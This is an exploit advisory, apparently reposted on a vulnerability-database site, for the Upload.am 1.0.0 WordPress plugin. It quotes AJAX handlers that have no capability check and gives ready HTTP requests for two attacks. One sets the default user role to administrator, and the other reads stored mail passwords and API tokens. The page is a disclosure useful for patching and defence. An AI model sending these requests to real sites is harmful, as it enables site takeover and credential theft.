Vulners
Lucene search
📄 WordPress Upload.am 1.0.0 Setting Modification / Information Disclosure
# Exploit Title: Upload.am 1.0.0 WordPress Plugin - Multiple Vulnerabilities
# Date: Aug 12, 2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://wordpress.org/plugins/upload-am-file-hosting-vpn/
# Version: <= 1.0.0
# Tested on: MacOS, localhost xampp
# Authentication required: Low privilege
Critical: Unauthorized Settings Modification (CWE-862)
CVE-ID: N/A
CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)
Affected File: upload-am-file-hosting-vpn.php:283-291
Vulnerable Code:
283: add_action('wp_ajax_upload_am_update_option', function () {
284: check_ajax_referer('upload_am_nonce', 'nonce');
285: if (!isset($_POST['option_name']) || !isset($_POST['option_value'])) {
286: wp_send_json_error(['message' => 'Missing required parameters']);
287: }
288: $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
289: $option_value = sanitize_text_field(wp_unslash($_POST['option_value']));
290: update_option($option_name, $option_value);
291: wp_send_json_success(['message' => 'Option updated']);
Input Source:
Parameter: $_POST['option_name'] and $_POST['option_value']
Flow: User input -> sanitize_text_field() -> update_option() with no capability check
Impact:
Complete WordPress configuration control allowing:
Privilege escalation (setting default_role to administrator)
Site takeover (modifying admin_email, siteurl)
Security bypass (disabling security plugins via active_plugins option)
Malicious redirections and content injection
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value
action=upload_am_update_option&option_name=default_role&option_value=administrator&nonce=VALID_NONCE_HERE
============================================================================================================
High: Sensitive Information Disclosure (CWE-200)
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Affected File: upload-am-file-hosting-vpn.php:275-281
Vulnerable Code:
275: add_action('wp_ajax_upload_am_get_option', function () {
276: check_ajax_referer('upload_am_nonce', 'nonce');
277: if (!isset($_POST['option_name'])) {
278: wp_send_json_error(['message' => 'Missing option_name']);
279: }
280: $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
281: $value = get_option($option_name);
282: wp_send_json_success($value);
Parameter: $_POST['option_name']
Flow: User input -> sanitize_text_field() -> get_option() -> JSON response
POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value
action=upload_am_get_option&option_name=upload_am_access_token&nonce=VALID_NONCE_HERE
Additional sensitive options that can be extracted:
option_name=mailserver_login
option_name=mailserver_pass
# Site configuration
option_name=admin_email
option_name=users_can_register
option_name=active_plugins
option_name=siteurl
option_name=home
# Authentication tokens
option_name=upload_am_access_token
option_name=upload_am_refresh_token
Impact:
Exposure of sensitive WordPress configuration including:
API tokens and credentials
Plugin/theme configuration
Administrative email addresses
Site URLs and security settingsData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2025 00:00Current
6.9Medium risk
Vulners AI Score6.9